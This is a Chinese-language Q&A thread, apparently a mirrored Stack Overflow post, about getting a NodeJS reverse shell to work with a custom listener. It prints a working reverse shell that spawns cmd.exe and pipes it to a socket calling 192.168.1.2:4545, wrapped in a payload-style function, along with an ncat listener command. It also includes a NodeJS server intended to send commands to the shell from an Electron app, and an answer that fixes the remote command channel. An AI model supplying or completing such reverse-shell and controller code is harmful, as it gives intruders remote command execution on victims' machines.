0

大家早上好,当我创建套接字并使用 netcat 侦听时,我在 NodeJS 中遇到了反向 shell 的问题,它完美地工作,但是当我使用 net.Server 创建新服务器时,我收到了 shell 的标头,但它不是交互式的,shell 代码是这样的:

  (function(){
      var net = require("net"),
      child = require("child_process"),
      shell = child.spawn("cmd.exe", []);
      var client = new net.Socket();
      client.connect(4545, "192.168.1.2", function(){      
        client.pipe(shell.stdin);
        shell.stdout.pipe(client);
        shell.stderr.pipe(client);
      });
      return /a/;
  })();

当我用 netcat 听时,我可以得到反向 shell

ncat -nvlp 4545

但是当我想在 nodejs 中创建 TCP 服务器时出现问题,我收到 cmd.exe 的横幅但没有交互性

这是服务器部分的代码:

    const net = require("net");
let server = new net.Server();

server.listen({ host: '192.168.1.2', port: 4545 }, () => {
  console.log(`Server listen in 4545`);
});

server.on("close", () => {
  console.log('connection closed')
});

server.on("error", (e) => {
  if (e.code === "EADDRINUSE") {
    console.log("Address in use, retrying...");
    setTimeout(() => {
      this.server.close();
      this.server.listen(4545, '192.168.1.2');
    }, 2000);
  }
});

server.on("connection", (socket) => {
  console.log("new connection");

  // HERE I SEND COMMAND WITH ELECTRON JS
  socket.write('command');
  console.log((socket.pipe(socket));

  // Socket is quitted
  socket.on("close", () => {
      console.log('socket closed')
  });

  socket.on("end", () => {
    console.log(`Client ${socket} disconnected`);
    socket.destroy();
  });      

});

当我发送命令示例' dir '时,我收到一个带有位于服务器上方的管道的对象所以问题是当我发送命令时如何接收命令的结果,例如接收套接字的文件和目录列表

 Socket {
    connecting: false,
    _hadError: false,
    _parent: null,
    _host: null,
    _readableState: ReadableState {
      objectMode: false,
      highWaterMark: 16384,
      buffer: BufferList { head: null, tail: null, length: 0 },
      length: 0,
      pipes: [Circular],
      pipesCount: 1,
      flowing: true,
      ended: false,
      endEmitted: false,
      reading: true,
      sync: false,
      needReadable: true,
      emittedReadable: false,
      readableListening: false,
      resumeScheduled: false,
      paused: false,
      emitClose: false,
      autoDestroy: false,
      destroyed: false,
      defaultEncoding: 'utf8',
      awaitDrain: 0,
      readingMore: false,
      decoder: null,
      encoding: null
    },
    readable: true,
    _events: [Object: null prototype] {
      end: [ [Function: onReadableStreamEnd], [Function], [Function] ],
      close: [ [Function], [Function] ],
      data: [ [Function], [Function: ondata] ],
      unpipe: [Function: onunpipe],
      error: [Function: onerror],
      finish: [Function: bound onceWrapper] { listener: [Function: onfinish] }
    },
    _eventsCount: 6,
    _maxListeners: undefined,
    _writableState: WritableState {
      objectMode: false,
      highWaterMark: 16384,
      finalCalled: false,
      needDrain: false,
      ending: false,
      ended: false,
      finished: false,
      destroyed: false,
      decodeStrings: false,
      defaultEncoding: 'utf8',
      length: 0,
      writing: false,
      corked: 0,
      sync: false,
      bufferProcessing: false,
      onwrite: [Function: bound onwrite],
      writecb: null,
      writelen: 0,
      afterWriteTickInfo: {
        count: 1,
        cb: [Function: nop],
        stream: [Circular],
        state: [Circular]
      },
      bufferedRequest: null,
      lastBufferedRequest: null,
      pendingcb: 1,
      prefinished: false,
      errorEmitted: false,
      emitClose: false,
      autoDestroy: false,
      bufferedRequestCount: 0,
      corkedRequestsFree: {
        next: null,
        entry: null,
        finish: [Function: bound onCorkedFinish]
      }
    },
    writable: true,
    allowHalfOpen: false,
    _sockname: { address: '192.168.1.2', family: 'IPv4', port: 4545},
    _pendingData: null,
    _pendingEncoding: '',
    server: Server {
      _events: [Object: null prototype] {
        listening: [Function],
        close: [Function],
        error: [Function],
        connection: [Function]
      },
      _eventsCount: 4,
      _maxListeners: undefined,
      _connections: 1,
      _handle: TCP {
        reading: false,
        onconnection: [Function: onconnection],
        [Symbol(owner)]: [Circular]
      },
      _usingWorkers: false,
      _workers: [],
      _unref: false,
      allowHalfOpen: false,
      pauseOnConnect: false,
      _connectionKey: '4:192.168.1.2:4443',
      [Symbol(asyncId)]: 16
    },
    _server: Server {
      _events: [Object: null prototype] {
        listening: [Function],
        close: [Function],
        error: [Function],
        connection: [Function]
      },
      _eventsCount: 4,
      _maxListeners: undefined,
      _connections: 1,
      _handle: TCP {
        reading: false,
        onconnection: [Function: onconnection],
        [Symbol(owner)]: [Circular]
      },
      _usingWorkers: false,
      _workers: [],
      _unref: false,
      allowHalfOpen: false,
      pauseOnConnect: false,
      _connectionKey: '4:192.168.1.2:4545',
      [Symbol(asyncId)]: 16
    },
    id: 790,
    _peername: { address: '192.168.1.2', family: 'IPv4', port: 59793 },
    [Symbol(asyncId)]: 18,
    [Symbol(kHandle)]: TCP {
      reading: true,
      onconnection: null,
      [Symbol(owner)]: [Circular]
    },
    [Symbol(lastWriteQueueSize)]: 0,
    [Symbol(timeout)]: null,
    [Symbol(kBuffer)]: null,
    [Symbol(kBufferCb)]: null,
    [Symbol(kBufferGen)]: null,
    [Symbol(kBytesRead)]: 0,
    [Symbol(kBytesWritten)]: 0
  }
4

1 回答 1

0

经过几次尝试,我设法在 write 中添加了\n以输入代码,因此代码变为

socket.write('command'+ '\n');
于 2020-06-07T15:24:46.833 回答